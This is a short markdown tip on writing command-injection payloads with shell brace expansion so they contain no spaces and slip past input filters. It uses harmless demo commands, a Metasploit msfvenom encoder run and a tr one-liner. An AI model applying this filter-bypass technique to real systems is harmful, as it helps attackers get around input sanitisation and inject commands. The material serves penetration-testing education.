Shell Brace Expansion.md

This one blew my mind. An old trick applied in a new way: Shell brace expansion. Simplify your payloads and filter bypass for command execution. No need for spaces or input field separators.

$ file m.{exe,dll}
m.exe: PE32+ executable (console) x86-64, for MS Windows
m.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

$ {which,-a,curl}
/usr/bin/curl
/bin/curl

You have likely used shell brace expansion to run one command on multiple arguments. Include the command itself in the brace expansion. Learned this the other night from @ippsec.

This is much cleaner than fuzzing character encoding or splitting the command with ${IFS}.

Using the Metasploit encoder:

wvu@kharak:~/rapid7/metasploit-framework:master$ echo -n "which -a curl" | ./msfvenom -p - -a cmd --platform unix -b " " -e cmd/brace
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 15 (iteration=0)
cmd/brace chosen with final size 15
Payload size: 15 bytes
{which,-a,curl}
wvu@kharak:~/rapid7/metasploit-framework:master$

Quick one-liner without Metasploit:

wvu@kharak:~$ echo "which -a curl" | echo "{$(tr -s " " ,)}"
{which,-a,curl}
wvu@kharak:~$

ETA: This doesn't escape , or handle [:space:].

@wvu-r7 coming through! 🔥